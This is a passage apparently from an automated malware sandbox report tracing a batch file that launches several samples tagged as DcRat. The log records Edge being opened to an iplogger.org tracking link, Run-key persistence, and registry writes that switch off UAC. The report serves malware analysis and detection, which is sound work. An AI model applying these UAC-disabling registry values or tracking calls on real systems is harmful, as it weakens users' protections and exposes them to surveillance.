memory of 824 4044 4.exe 106 PID 4044 wrote to memory of 824 4044 4.exe 106 PID 4044 wrote to memory of 824 4044 4.exe 106 PID 4880 wrote to memory of 1852 4880 cmd.exe 108 PID 4880 wrote to memory of 1852 4880 cmd.exe 108 PID 452 wrote to memory of 1080 452 5.exe 107 PID 452 wrote to memory of 1080 452 5.exe 107 PID 452 wrote to memory of 1080 452 5.exe 107 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 PID 1388 wrote to memory of 1088 1388 msedge.exe 111 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Fondue.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Fondue.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" Fondue.exe -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 6700 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rip.bat"1⤵
- DcRat
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Users\Admin\AppData\Local\Temp\1.exe1.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA58.tmp\AA87.tmp\AA88.bat C:\Users\Admin\AppData\Local\Temp\1.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s64⤵
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a5047185⤵PID:4172
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,14038481803023492421,9768421630712696300,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:25⤵PID:4064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,14038481803023492421,9768421630712696300,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:3832
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe1.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA47.tmp\AA48.tmp\AA49.bat C:\Users\Admin\AppData\Local\Temp\1.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s64⤵
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a5047185⤵PID:4512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,17819899355196799753,13614699943647842470,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:25⤵PID:3924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,17819899355196799753,13614699943647842470,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:2996
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe1.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AA57.tmp\AA77.tmp\AA88.bat C:\Users\Admin\AppData\Local\Temp\1.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s64⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a5047185⤵PID:2976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,17158845095647533318,10512177733253086354,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:25⤵PID:1096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,17158845095647533318,10512177733253086354,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:5112
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe1.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AB51.tmp\AB61.tmp\AB62.bat C:\Users\Admin\AppData\Local\Temp\1.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4632 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s64⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a5047185⤵PID:2876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:25⤵PID:1088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2688 /prefetch:85⤵PID:976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:15⤵PID:5208
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:15⤵PID:5388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3964 /prefetch:15⤵PID:5552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:15⤵PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:15⤵PID:5600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4724 /prefetch:15⤵PID:5856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6092 /prefetch:85⤵PID:3500
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:15⤵PID:5520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5576 /prefetch:15⤵PID:6184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:15⤵PID:6200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:15⤵PID:6256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:15⤵PID:6308
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:15⤵PID:6344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6800 /prefetch:15⤵PID:6364
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:15⤵PID:6392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7308 /prefetch:15⤵PID:6504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8972 /prefetch:85⤵PID:5112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings5⤵
- Drops file in Program Files directory
PID:5084 -
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x11c,0x118,0x240,0xf0,0x7ff607045460,0x7ff607045470,0x7ff6070454806⤵PID:1488
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8972 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
PID:4856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8604 /prefetch:85⤵PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=9008 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:4108
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1736 /prefetch:85⤵PID:3944
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4380 /prefetch:85⤵PID:6640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2116,11933035639295990007,3662664860176366432,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:85⤵PID:4500
-
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2.doc" /o ""2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4868
-
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\3.xlsx"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe4.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\SysWOW64\fondue.exe"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll3⤵PID:824
-
C:\Windows\system32\FonDUE.EXE"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll4⤵PID:5544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe5.exe2⤵
- Suspicious use of WriteProcessMemory
PID:452 -
C:\Windows\SysWOW64\fondue.exe"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll3⤵PID:1080
-
C:\Windows\system32\FonDUE.EXE"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll4⤵PID:5492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe6.exe2⤵
- DcRat
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\RScBCIKDLc.bat"3⤵PID:6564
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵PID:6536
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1644 -
C:\Windows\SysWOW64\glmf32\Fondue.exe"C:\Windows\SysWOW64\glmf32\Fondue.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:3580
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s62⤵PID:3320
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a5047183⤵PID:1480
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/2bB2s62⤵PID:5328
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x40,0x108,0x7ff81a5046f8,0x7ff81a504708,0x7ff81a5047183⤵PID:5632
-
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe7.exe2⤵PID:5640
-
C:\Windows\SysWOW64\fondue.exe"C:\Windows\system32\fondue.exe" /enable-feature:NetFx3 /caller-name:mscoreei.dll3⤵PID:5744
-
C:\Windows\system32\FonDUE.EXE"C:\Windows\sysnative\FonDUE.EXE" /enable-feature:NetFx3 /caller-name:mscoreei.dll4⤵PID:5696
-
-
-
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\9.docm" /o ""2⤵
- Checks processor information in registry
- Enumerates system info in registry
